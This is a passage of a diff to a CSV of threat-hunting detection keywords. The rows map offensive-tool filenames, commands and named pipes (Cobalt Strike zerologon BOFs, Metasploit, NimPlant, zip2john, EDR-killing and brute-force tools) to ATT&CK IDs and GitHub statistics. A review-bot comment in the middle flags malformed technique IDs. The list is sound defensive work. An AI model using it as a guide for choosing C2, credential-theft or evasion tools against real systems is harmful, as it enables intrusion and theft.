It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*zer0condition/mhydeath*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","1","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" "*zeroday-powershell*","offensive_tool_keyword","zeroday-powershell","This will exploit the Windows operating system allowing you to modify the file Some.dll.","T1203 - T1574.001 - T1546.011","TA0002 - TA0007 - TA0008","N/A","N/A","Exploitation tools","https://github.com/OneLogicalMyth/zeroday-powershell","1","1","N/A","N/A","4","323","96","2018-09-12T09:03:04Z","2018-09-10T16:34:14Z" "*zerologon clone *https*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*zerologon.py*","offensive_tool_keyword","POC","Zerologon CVE exploitation","T1210 - T1071","TA0008 - TA0006","N/A","N/A","Exploitation tools","https://github.com/michaelpoznecki/zerologon","1","1","N/A","N/A","1","9","4","2020-09-15T16:31:59Z","2020-09-15T05:32:24Z" "*zerologon.x64*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon.x86*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" -"*zerologon_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*zerologon_check*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" "*ZeroLogon-BOF*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF zerologon exploit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard 
Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ZeroLogon-BOF","1","1","N/A","10","10","148","40","2022-04-25T11:22:45Z","2020-09-17T02:07:13Z" "*zerologon-restore * -target-ip *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*ZeroLogonScanner.*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","","N/A","","","" 
@@ -18623,25 +18812,25 @@ "*Ziconius/FudgeC2*","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","237","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*ziiiiizzzb*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*ziiiiizzzib*","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in 
process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","0","N/A","10","10","490","114","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" -"*zip2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" -"*--ZipFileName $TrustedDomain.zip*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*zippy.nim*","offensive_tool_keyword","nimplant","A light-weight 
first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*zip2john *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*--ZipFileName $TrustedDomain.zip*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*zippy.nim*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" "*Zloader-FCVP*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*zoom1.msi.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation 
tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*zoom2.dll.gpg*","offensive_tool_keyword","Zloader","Zloader Installs Remote Access Backdoors and Delivers Cobalt Strike","T1059 - T1220 - T1566.001 - T1059.005 - T1218.011 - T1562.001 - T1204","TA0002 - TA0008 - TA0006 - TA0001 - TA0010 - TA0003","N/A","N/A","Exploitation tools","https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*zsh_executor *","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","0","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*zsploit-1.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*zsploit-2.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ztgrace*changeme*","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1349","264","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" +"*zsploit-1.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*zsploit-2.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ztgrace*changeme*","offensive_tool_keyword","changeme","A default credential scanner.","T1110 - T1114 - T1112 - T1056","TA0001 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/ztgrace/changeme","1","1","N/A","N/A","10","1350","264","2021-12-26T10:20:11Z","2016-03-11T17:10:34Z" "*ZxKmz4hXp6XKmTPg9lzgYxXN4sFr2pzo*","offensive_tool_keyword","SocialBox-Termux","SocialBox is a Bruteforce Attack Framework Facebook - Gmail - Instagram - Twitter for termux on android","T1110.001 - T1110.003 - T1078.003","TA0001 - TA0006 - TA0040","N/A","N/A","Credential Access","https://github.com/samsesh/insta-bf","1","0","N/A","7","1","39","6","2021-12-23T17:41:12Z","2020-11-20T22:22:48Z" "*ZXZpZGVuY2UuZmJpLmdvdg==*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" -"*zyn3rgy/LdapRelayScan*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" 
+"*zyn3rgy/LdapRelayScan*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" "*zzzteph/weakpass*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Zzzz Zzzzz Zzzz....*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","0","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" -"./beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8794","2027","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"./beef","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" "./CVE-20* -*","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z" "./radare *","offensive_tool_keyword","RadareEye","Tool for especially scanning nearby devices and execute a given command on its own system while the target device comes in range.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Network Exploitation tools","https://github.com/souravbaghz/RadareEye","1","0","N/A","N/A","4","338","50","2021-12-11T06:16:37Z","2021-01-07T04:52:58Z" -".exe -t keepass -f *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +".exe -t keepass -f *","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "/adhunt.py","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" 
"\\demoagent_11","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\demoagent_22","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - 
T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" 
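Review bot: The re-added `*zippy.nim*` row still carries `T1059-001` in `metadata_tool_techniques`, which is not a well-formed ATT&CK ID (sub-techniques are written with a dot, so presumably `T1059.001`), and its tactics field lists `TA0002` twice. Since these rows are being rewritten anyway, the two fields could become `"T1059.001 - T1027 - T1036"` and `"TA0002 - TA0005"`. The re-added `*zsploit-1.txt*` and `*zsploit-2.txt*` rows have `T1204 -T1210` with no space after the hyphen, so a consumer that splits this column on ` - ` would presumably get one merged token instead of two techniques; `T1204 - T1210` matches the delimiter used elsewhere in that field. A format check on the technique and tactic columns in the refresh job that updates the star and fork counts would stop malformed IDs from reaching detection rules built from this list.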
@@ -18674,18 +18863,18 @@ "\\Winsock2\CatalogChangeListener-*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","pipe names (sysmon EID 17 - 18)","10","10","N/A","N/A","N/A","N/A" "\\wkssvc_*","offensive_tool_keyword","cobaltstrike","pipe names - Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 
